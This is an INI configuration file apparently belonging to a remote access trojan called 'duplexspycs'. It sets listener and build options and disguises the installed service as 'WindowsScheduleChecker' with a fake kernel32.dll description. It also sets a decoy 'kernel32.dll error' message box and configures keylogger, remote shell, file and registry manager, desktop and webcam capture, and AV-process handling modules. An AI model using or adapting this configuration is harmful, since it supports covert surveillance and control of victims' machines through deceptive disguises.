; --------------------[README]-------------------- 
; Configuration
; --------------------[README]--------------------

[General]
; Information
version=1.0.0
app_name=duplexspycs
folder_down=Downloads
folder_audio=Audio

; Listen
listen_port=5000
listen_limit=10000
listen_timeout=100000

;database
db_file=data.db

[Crypto]
aes_key_size=256
rsa_key_size=4096

;Challenge
challenge=HelloWorld
bRandom=1
length=10

[Build]
bd_merged=merged.il
bd_slick=slick.il
bd_installer=installer.il

; Connection
timeout=10000
retry=1000

; Service
name=WindowsScheduleChecker
info=Check Windows kernel32.dll

; Install
bDictionary=0

; Misc
use_msgbox=0
msgbox_caption=kernel32.dll error
msgbox_text=Cannot convert value 0xffffffff into DWORD

use_icon=0
delete=0

[ClientConfig]


[Information]

[System]

[Keylogger]

[RunScript]

[FileMgr]
; General
max_folder=100
max_file=100
bMaxFolder=1
bMaxFile=1
timeout=10000
thread=20
; Send file chunk size(KB)
uf_size=1024
df_size=1024

[RegEdit]
max_key=100
max_value=100
bMaxKey=1
bMaxValue=1
timeout=10000

[TaskMgr]
AVjson=
childproc=1

[ServMgr]
AVjson=

[WindowMgr]

[Shell]
exec=C:\Windows\System32\cmd.exe
bHistory=1
file_history=

[Desktop]
quality=100
record_showdatetime=1

[Webcam]
quality=100
record_showdatetime=1

[MultiMonitor]


[MultiWebcam]

[FunStuff]
msgbox_caption=Hello!
msgbox_text=I am sorry, I don't work for you anymore...
dir_lockscreen=
dir_wallpaper=
speak_text=